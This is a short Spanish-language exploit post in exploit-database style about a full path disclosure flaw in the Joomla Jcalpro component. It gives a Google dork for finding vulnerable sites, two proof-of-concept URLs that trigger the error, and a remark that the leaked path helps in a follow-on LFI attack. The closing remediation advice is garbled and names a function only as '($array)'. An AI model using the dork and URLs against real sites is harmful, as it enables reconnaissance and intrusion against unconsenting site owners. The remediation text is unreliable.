Vulnerabilidad - Full Path Disclosure - FPD - Joomla


# Exploit Título   : Joomla Jcalpro Full Path Disclosure
# Exploit Autor   : Sky_BlaCk
# Versión           : 1.5,1.7
# Tested on        : Window and Linux
# Google dork    :  [inurl:index.php?option=com_jcalpro]


--------------------

#      ~ Explotación ~    #
-------------------------------


Concepto :

Full Path Disclosure (FPD) permiten al atacante ver la ruta de acceso al archivo webroot /. por ejemplo: /home/omg/htdocs/file/.Dicha vulnerabilidad nos puede ser muy  útil al momento de hacer un posible ataque LFI.


PoC :

http://www.sitio.com/index.php?option=com_jcalpro&Itemid=112&extmode=cal&date=2012-01-01

http://www.sitio.com/index.php?option=com_jcalpro&Itemid=112&extmode=cal&date=2012-01-01&lang= ca_ES


Recomendaciones : 

Asegúrese que la variable que intenta pasar exista y no es nulo primero. También debe asegurarse de que el nombre de la variable este escrito correctamente.

Se recomienda usar la función ($array), para asegurarse de que la variable que va a ingresar es de hecho un arreglo.


Agradecimientos :

JALIL KAMEL